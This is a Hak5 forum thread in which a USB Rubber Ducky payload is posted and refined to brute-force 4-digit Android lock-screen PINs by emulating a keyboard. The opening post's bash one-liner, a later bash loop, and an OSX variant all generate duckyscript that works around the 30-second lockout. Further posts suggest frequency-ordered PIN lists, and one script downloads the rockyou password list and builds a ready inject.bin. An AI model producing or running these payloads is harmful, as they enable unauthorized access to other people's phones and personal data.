Darren Kitchen

[Payload] Android Brute Force 4-digit pin

62 posts in this topic

I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)


echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
[/CODE]

6

Share this post


Link to post
Share on other sites

Darren Kitchen... once again... kicks ass and is like, "Whatevs".

Keep on rockin @Darren!

0

Share this post


Link to post
Share on other sites

I sent you a message elsewhere, but figured it would fit here as well.

Does this require ADB to be enabled?

0

Share this post


Link to post
Share on other sites

No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer.

For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.

0

Share this post


Link to post
Share on other sites

No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer.

For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.

Good to know, can't wait for your final version. Need to pick myself up a new and improved ducky (currently only have the dev teensy, I was one of the lucky ones.) next week when I get paid... along with other hakshop goodies :D.

0

Share this post


Link to post
Share on other sites

would this not also be effective on the new windows 8 , when people have the option to change their signin password with a pin ? :)

0

Share this post


Link to post
Share on other sites

I don't have my SD card reader with me to update my payloads for my ducky right now but can't wait to give it a shot!

0

Share this post


Link to post
Share on other sites

I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.

C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; ec

ho {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$

/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTE

R\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

C:\Users\UserName\Desktop>dir android*

Volume in drive C has no label.

Volume Serial Number is 2499-C7D7

Directory of C:\Users\UserName\Desktop

07/07/2012 01:03 AM 165 Android Paths.txt

08/30/2012 08:00 PM 50 Android SDK Path.txt

12/09/2012 02:26 PM 63 android_brute-force_0000-9999.txt

3 File(s) 278 bytes

0 Dir(s) 831,818,436,608 bytes free

C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt

DELAY 5000 ; echo {0000..9999}

STRING

DELAY 1000

ENTER

ENTER

C:\Users\UserName\Desktop>

Edited by overwraith
0

Share this post


Link to post
Share on other sites

So when I plug the Rubber Ducky into my phone is doesn't do anything at all. The light doesn't light up or anything. But When I plug it into my computer I see the inject.bin file and the led's on the duck lights up. Any ideas?

0

Share this post


Link to post
Share on other sites

To adapt Darren's simple script to generate android.txt on OSX, you need Mac Ports installed and you need to install gsed (gnu-sed), as gnu-sed is slightly different to OSX's default bsd-sed.

port install gsed[/CODE]

then:

[CODE]echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | gsed '0~5 s/$/\nWAIT/g' | gsed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | gsed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt[/CODE]

Not sure whats going wrong with cygwin?

0

Share this post


Link to post
Share on other sites

I created a script to generate pretty much the same output using only bash loops/conditions


#!/bin/bash
count=0
echo "DELAY 5000"
for pin in {0000..9999}
do
count=$((count+1))
echo "STRING $pin"
# After every other pin, do this
if [ $((count % 2)) -eq 0 ]; then
echo "DELAY 1000"
echo "ENTER"
echo "ENTER"
fi
# After 5 pins, do this
if [ $((count % 5)) -eq 0 ]; then
for (( delay=0 ; $((delay < 4)) ; delay=$((delay+1)) ))
do
echo "DELAY 5000"
echo "ENTER"
done
fi
done
[/CODE]

0

Share this post


Link to post
Share on other sites

You probably could get a huge performance boost out of this method if you tweaked your PIN list a little.

Most common PINs would be any combinations with all same numbers like 0000, 1111, 2222, 3333, etc. So you should probably try thous first then things like 1234, 1212, 4321, 6969. Because people like patterns and people are lazy and don't wan't to remember more than two numbers.

Just my two cents.

2

Share this post


Link to post
Share on other sites

It is kind of odd they didn't lock down the device after a certain number of tries as pattern lock does that after 20 tries.

And once it gets locked down you'll need your gmail password to unlock. (Which also sort of fails as well cause reboot resets the counter)

Edited by Kag
0

Share this post


Link to post
Share on other sites

Hello everybody,

I must say that I am surprised that noone (only Totu) suggested to use a handcrafted dictionary. I mean, you all probably read the article on CC PIN security. I think if you try to bruteforce your way into a device with PIN you should really use that list, instead of a generated one.

Here is the study?

http://www.datagenet...september32012/

and here are the first 10 pins I would try:

1234

1111

0000

1212

7777

1004

2000

4444

2222

6969

1 in 4 chance of hacking the device in under a minute!

What do you say?

Edited by iamnoxtras
1

Share this post


Link to post
Share on other sites

My password is....

1

2

4

4

5

The same one on my luggage...

1

Share this post


Link to post
Share on other sites

I figured out what the problem was... I should have figured that the Linux foo would not work on the Windows command line even if I did put the CYGWIN bin directory in my path variable. Have to use the CYGWIN prompt provided with their software.

0

Share this post


Link to post
Share on other sites

Another good thing to do would be to download the rockyou password list from skullsecurity. Take like the top 5000 out of it as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time as there is no 5 password then wait limiter.

** Edit **

Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen.


#!/bin/bash
clear
echo -e "========================================================"
echo -e " This script downloads the rockyou password list"
echo -e " then takes the top 5000 passwords and generates"
echo -e " an Android brute forcer."
echo -e "========================================================"
echo -e " You need to have duckencode.jar installed as well"
echo -e " as bzip2 and wget."
echo -e "========================================================"
echo -e " This script is licensed under the GPLv3 and is"
echo -e " currently maintained by James Luther (CaptainHooligan)"
echo -e "========================================================"
echo ""
echo ""
WHOAMI=`id | sed -e 's/(.*//'`
if [ "$WHOAMI" != "uid=0" ] ; then
echo "Sorry, you need super user access to run this script."
exit 1
fi
echo -e "Verifying prerequisites are installed ... "
echo ""
duckdir=`find / -name duckencode.jar`
if [ -z "$duckdir" ] ; then
echo "Duckencode.jar not found on system. Please verify you have this installed."
exit 1
else
echo "Duckencode.jar prerequisite met."
fi
duckinpath=`which duckencode.jar`
if [ -z "$duckinpath" ] ; then
PATH=$PATH:$duckdir
fi
bundir=`find / -name bzip2`
if [ -z "$bundir" ] ; then
echo "Bzip2 not found on system. Please verify you have this installed."
exit 1
else
echo "Bzip2 prerequisite met."
fi
buninpath=`which bzip2`
if [ -z "$buninpath" ] ; then
PATH=$PATH:$bundir
fi
wgetdir=`find / -name wget`
if [ -z "$wgetdir" ] ; then
echo "Wget not found on system. Please verify you have this installed."
exit 1
else
echo "Wget prerequisite met."
fi
wgetinpath=`which wget`
if [ -z "$wgetinpath" ] ; then
PATH=$PATH:$wgetdir
fi
echo ""
echo ""
#echo -e "Which do you want to attack?"
#echo -e " 1. Encryption Screen"
#echo -e " 2. Password Screen"
#read answer
#case answer
# 1)
echo -e "Verify connection to internet and press [Enter]."
read
echo ""
echo ""
echo -e "Downloading rockyou password list. This can take some time ..."
echo ""
echo ""
wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bunzip rockyou.txt.bz2
echo ""
echo ""
echo -e "Creating rock-android.txt file ... "
echo ""
echo ""
echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt
echo -e "rock-android.txt created!"
ls -lart rock-android.txt
echo ""
echo ""
echo -e "Creating inject.bin file ... "
java -jar duckencode.jar -i rock-android.txt
echo ""
echo ""
echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
ls -lart inject.bin
[/CODE]

Edited by CaptainHooligan
1

Share this post


Link to post
Share on other sites

My pin is actually a really old phone number, none of mine, but one I had memorized. It's also not one of the multiple same number combos. I'd think most people would go this route, the lazy ones would probably use their own number...

0

Share this post


Link to post
Share on other sites

Will it continue to go deep into the brute forcing even with a different pin lock screen? For example the Galaxy S3 might have a different login screen for PINs than the Nexus because of touchwiz. Does that affect the payload at all? Would it press the wrong numbers or keys because of a different key layout?

0

Share this post


Link to post
Share on other sites

It's not based on the layout of the interface. The payload is based on the manual entry of the pass code by the keyboard, ie literally pressing 1-2-3-4. As long as the new models support USB keyboard by default, then I can't see any reason why it wouldn't work.

1

Share this post


Link to post
Share on other sites

Hi All,

I have a Motorla ME863 cell phone and after a few xmas drinks was a pratt and changed my 4 digit number pass code ....and yup you guessed it ...promptly forgot the damm thing.

Is there anyone in the UK southeast / Berks/Bucks/ London area that can help me fix without having to do a factory reset ?

Many thanks in advance for all and any help

Rgds

JD

0

Share this post


Link to post
Share on other sites

Just to add, it is the Chinese version (purchased august 2012) and not the usa version so the gmail backdoor does not work, as china blocks gmail, facebook etc

0

Share this post


Link to post
Share on other sites

If it has USB keyboard support, get yourself a ducky or a Teensy board, and brute-force it. If it doesn't support USB keyboard, then you're kinda stuck. (As far as I know, anyway...)

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.